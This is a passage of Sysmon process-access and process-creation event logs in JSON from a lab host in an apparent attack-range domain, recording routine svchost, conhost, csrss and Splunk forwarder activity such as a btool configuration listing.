C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-00108F480500}","TargetProcessId":"4404","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.775\r\nProcessGuid: {41C8662E-1FF2-5F25-0000-001050490500}\r\nProcessId: 4376\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nParentProcessId: 4404\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.775","ProcessGuid":"{41C8662E-1FF2-5F25-0000-001050490500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF2-5F25-0000-00108F480500}","ParentProcessId":"4404","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServer --no-log","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1FF2-5F25-0000-00108F480500}\r\nSourceProcessId: 4404\r\nSourceThreadId: 3384\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-001050490500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1FF2-5F25-0000-00108F480500}","SourceProcessId":"4404","SourceThreadId":"3384","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-001050490500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-001050490500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-001050490500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 